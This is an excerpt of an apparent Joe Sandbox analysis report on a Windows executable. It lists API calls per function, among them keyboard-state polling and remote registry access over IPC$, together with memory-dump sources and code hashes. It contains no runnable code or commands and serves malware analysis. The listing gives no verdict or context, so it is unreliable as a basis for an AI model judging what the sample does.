                                                                                                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3218148540-0
                                                                                                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                        APIs
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                        • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 3104067586-3081909835
                                                                                                                                        • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                        • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                        Strings
                                                                                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                        • API String ID: 440038798-2785691316
                                                                                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                        • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                        • API String ID: 4136854206-1241985126
                                                                                                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                        APIs
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                        • String ID: 2
                                                                                                                                        • API String ID: 1331449709-450215437
                                                                                                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 3054410614-2561132961
                                                                                                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 600699880-22481851
                                                                                                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 3375834691-2160076837
                                                                                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                        APIs
